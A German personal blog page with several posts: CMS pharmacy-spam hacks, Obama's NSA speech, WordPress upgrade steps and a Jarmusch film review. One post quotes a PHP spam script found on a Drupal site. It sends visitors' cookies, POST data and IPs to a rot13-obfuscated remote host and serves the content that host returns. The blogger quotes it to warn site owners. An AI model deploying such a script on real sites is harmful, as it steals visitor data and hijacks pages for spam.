Pharmacy Spam

Published by:

Kriminelle Internetapotheken mieten keine eigenen Server an, sondern nisten sich per Schadskripten auf Fremdservern ein. Diese Aktionen sind nicht auf Anhieb sichtbar, feststellbar über die Eingabe bei Google des eigenen Site-Namens plus Medikamentenbezeichnungen.

Beispielsweise wird dann auf folgende Seiten verwiesen: ed-pillen.de Online Apotheke, EURO Pharmacy, EXS Pharmacy, RX-365 Online Apotheke, Canadian Drug Store, Tab md, medscom.com, cliopharma.com, pharmacyworld, Safe Med Stock.

Die Schaddateien liegen in diversen CMS, Typo3, WordPress, Joomla etc. Irgendwo gibt es immer eine Lücke. Auffällig werden sie dann auf jeden Fall in den Log-Dateien.

Infos zu Spam-Hacks:

http://aw-snap.info/articles/spam-hacks.php

Typo3-Hack: http://blog.namics.com/2012/01/a-study-in-viagra.html

Security-Checks:

http://www.unmaskparasites.com/

http://sitecheck.sucuri.net/

Obama: NSA folks are our neighbours

Published by:

Obamas ca. 45-minütige Rede vom Freitag, den 17.1.14, rechtfertigt vor allem Existenz und Vorgehen der Geheimdienste, inklusive NSA. Geheimdienste gehören quasi zur Geschichte der USA und haben schon seit dem Kampf gegen die Briten eine unabkömmliche Rolle gespielt.
Sie waren und sind in einem System der checks and balances verankert, wenngleich immer auch die Gefahr des Missbrauchs bestanden hat. Obama verweist auf die Überwachungsauswüchse in der ehemaligen DDR, aber auch auf die Überwachung von Bürgerrechtlern in den USA in den 60er Jahren. Er streut in seine Rede immer wieder die Risiken ein, die sich aus der geheimdienstlichen Tätigkeit für die Privatsphäre ergeben, liefert aber hauptsächlich sehr viele Argumente, die das Vorgehen der Geheimdienste verteidigen.

Seiner Auffassung nach haben sich seit dem Zusammenbruch der Sowjetunion, der Kalte Krieg lieferte ebenfalls eine Legitimation für die geheimdienstlichen Tätigkeiten, neue Gefahren entwickelt, mit korrespondierend geänderten Anforderungen an die Geheimdienste. Deren Tätigkeit war bisher auf Staaten ausgerichtet und nicht auf einzelne, singuläre Terrorgruppen, à la al Quaida. Ergo, um solche Feinde zu finden, müssen alle oder möglichst viele Daten durchsucht werden.
9/11 bedeutet einen Wendepunkt, eindeutig liegt die Aufgabe der Geheimdienste in der Prävention von Terroranschlägen, nicht nur in den USA, sondern weltweit. In dieser Hinsicht seien die Geheimdienste seit 9/11 auch erfolgreich gewesen und dies ist gewissermaßen auch ihre Pflicht.

In der Natur der Sache liege es beim Versuch verdächtige Aktionen aufzuspüren, dass im Falle digitaler Kommunikation eine Menge “bulk data” anfalle. Die Daten von Ottonormalverbraucher seien für die Geheimdienste nicht interessant, zwar seien sie “within our reach”, doch würden sie nicht missbraucht. Obama legt nahe, hier gewissermaßen der Ethik der Geheimdienstler (“NSA folks are our neighbours”) zu vertrauen. Auf der einen Seite, auf der anderen Seite basiert Freiheit, so Obama auch, aber nicht nur auf den Intentionen der Mächtigen, sondern auf Gesetzen. Nur Vertrauen reicht nicht aus. Hier liegt sicherlich der Ansatzpunkt für seine Reformbemühungen.

Mehr oder weniger deutlich wird in der Rede ebenfalls, dass technologisch in Richtung Überwachung mehr oder weniger alles möglich ist. Grundsätzlich ist es aber für Geheimdienste notwendig, diese Daten zu sammeln und zu durchforsten.
Dieses hat damit zu tun, dass die USA reale Feinde haben und gleichzeitig eine besondere Verantwortung und Rolle, nicht nur für das eigene Land.
Zum Vorwurf, die eigenen Partner auszuspionieren, hat Obama nur die Antwort übrig, dass dies die anderen auch tun würden.

In Aussicht stellt er Reformen, etwas mehr Kontrolle, Transparenz und “public debate”. Doch solange der Patriot Act gilt, wird dies im Wesentlichen nichts ändern.

WP-Upgrade und Konfiguration

Published by:

WordPress muss regelmäßig geupdatet werden, einfach aus Sicherheitsgründen. Geht relativ fix, ich mache es immer manuell.
Zuerst ein Backup, alle Dateien und die Datenbank. Die Datenbank lässt sich aus phpmyadmin heraus exportieren oder von der Konsole aus mit einem mysqldump-Befehl. Letzteres bietet sich bei größeren Datenbanken an:

mysqldump -u username -p passwort datenbankname > xyz.sql

Damit lässt sich dann alles wieder zurückspielen, falls etwas schief geht.

Dann können die Dateien aus dem Hauptverzeichnis gelöscht werden, außer wp-config, außerdem alle weiteren Verzeichnisse außer wp-content.

Die aktuelle WP-Version muss heruntergeladen werden und dann in das WP-Verzeichnis kopiert werde.

Als letzten Schritt muss aus dem Admin-Bereich per Klick noch die Datenbank aktualisiert werden.

Wichtig ist noch zu wissen welche Verzeichnis- bzw. Dateirechte WP braucht. Gehört nicht zum Update-Prozess, ist einfach wichtig

Hauptverzeichnis: schreibbar durch Nutzeraccount

wp-admin: schreibbar durch Nutzeraccount

wp-includes: schreibbar durch Nutzeraccount

wp-content: schreibbar durch Nutzeraccount und Webserver

So können die Rechte automatisch gesetzt werden:
Für Verzeichnisse:
find /path/to/your/wordpress/install/ -type d -exec chmod 755 {} \;

Für Dateien:
find /path/to/your/wordpress/install/ -type f -exec chmod 644 {} \;

Dies ist der Seite Hardening WordPress entnommen. Dort gibt es noch mehr Empfehlungen.

Fieses Spam-Skript

Published by:

Die Tage habe ich in einem Drupal-Unterordner ein fieses Spam-Skript ausfindig gemacht. Dieses führt dazu, dass dort eine Seite oder Seiten aufgebaut werden, die anderen Zwecken dient als der der Homepage, z.B. lässt sich auf diese Weise der Medikamentenhandel vorantreiben. Hier ist das gute Stück (man beachte die rot13-Verschlüsselung der URL):

$post = Array(
'self' => 'http://' . ($_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']) . $_SERVER['REQUEST_URI'],
'sub_id' => '',
//'page' => $_REQUEST['p'],
'PHP_SELF' => $_SERVER['PHP_SELF'],
'SERVER_PROTOCOL' => $_SERVER['SERVER_PROTOCOL'],
'REMOTE_ADDR' => $_SERVER['REMOTE_ADDR'],
'HTTP_REFERER' => $_SERVER['HTTP_REFERER'],
'HTTP_USER_AGENT' => $_SERVER['HTTP_USER_AGENT'],
'HTTP_ACCEPT_CHARSET' => $_SERVER['HTTP_ACCEPT_CHARSET'],
'GET' => serialize($_GET),
'POST' => serialize($_POST),
'COOKIE' => serialize($_COOKIE),
);
$masterUrl = str_rot13('uggc://klm.uhynubfg.arg/');
$url = "{$masterUrl}rgw.php";
$req = new HttpRequest($useCurl, $requestTimeout);
$pageTxt = $req->request($url, $post);
//echo $pageTxt;
if (!$pageTxt)
die404();
$page = unserialize($pageTxt);
//print_r($page);
if ($page['seal'] != $seal) {
//echo $pageTxt; // TODO: *** DEBUG, delete this!!! ***
die404();
}
foreach ($page['headers'] as $header) {
header($header);
}
//echo "

";
//print_r($page);
//echo "

";
echo $page['content'];
?>

Wie gegen den Mist wehren? Neben dem Üblichen, immer die aktuellste Version einspielen, Permissions etc, ist eine Webserver-Log-Analyse, z.B. via Webalizer nützlich.

Jim Jarmusch: Only Lovers left alive

Published by:

visuell opulent, im dunkel, halb-dunkel, adam und eve, zwei vampire, die seit jahrhunderten noch leben, tagsüber schlafen und sich regelmäßig mit blut eindecken.
am anfang des films weiß der zuschauer lange nicht, worum es geht. eingeführt wird in die wohnung von adam, ein musikstudio mit zig gitarren aus unterschiedlichen zeiten, gerümpelhaft, zugestopft. er bekommt besuch von ian, der ihm gitarren beschafft und besorgungen macht. die musik ist tranceartig, melancholisch. zwischendurch sucht adam ein krankenhaus auf, wo er gegen cash blutkonserven ersteht. als arzt verkleidet mit einem uralten stethoskop, das krankenhaus, der hellste ort im film.
das blut trinken, so es zum ersten mal im film auftaucht, wird zelebriert. ein zusammenschnitt von drei figuren und orten. adam und eve, die ebenso wie marlowe in tanger lebt. das glas wird angesetzt getrunken, sie lehnen sich nach hinten, der mund leicht geöffnet, man sieht die dezent hervortretenden vampirzähne. eve wandelt durch die engen basargassen von tanger, sepialicht, arabische kulisse, sie lebt in einer wohnung mit vielen büchern, durcheinandergeworfen, ähnlich chaotisch wie bei adam. sie bekommt ihr blut von marlowe, trägt es in einer plastiktüte nach hause.
fliegen können vampire nur nachts, eve macht sich auf den weg von tanger nach detroit, organisiert den flug per smartphone (weißes iphone, product placement). ein mitpassagier, der sich am finger verletzt und blutet, weckt die vampirgier, die jedoch gezügelt werden kann.
das verhältnis von adam und eve, ein liebesverhältnis, das jedoch von unterschiedlichen temperamenten bestimmt ist, adam ist sehr unterkühlt, zurückgenommen, fast feindselig, eve versucht ihm lebenslust einzuhauchen. adam hat sich zuvor bei ian eine patrone mit einem holzkugelkern bestellt. er stellte ihm drei holzarten zur auswahl, mit lateinischem namen. diese details unterstreichen auch die verschrobenheit des films, der vampirischen existenzweise.
der film ist eher handlungsarm, der akzent liegt auf stimmung und atmosphäre. zu besuch kommt unerwünscht die schwester von eve. da gibt es mal einen ausflug in eine musikbar, wo auch adams musik gespielt wird. ian ist dabei und wird in der folge von adams schwester ausgesaugt. der leichnam wird in einer von detroits leeren industriehallen entsorgt. detroit ist eine verlassene stadt, nächtliche autofahrten durch eine kulisse. der blick auf das außen blutleer, die menschen werden als zombies eingeschätzt und ihr verhalten durchwegs als negativ bewertet. es dringt so ein bisschen ökologische kritik durch.
als adam und eve völlig ausgebrannt nach tanger kommen, liegt marlowe im sterben und hat für die beiden nur noch eine letzte kleine flasche blut. ein cafekonzert mit band und sängerin, arabisch, gitarrensounds, eve kauft adam eine oud. und am ende sitzen sie da und beobachten ein junges liebespaar. längere zeit, bis…

Bad Behavior has blocked 80 access attempts in the last 7 days.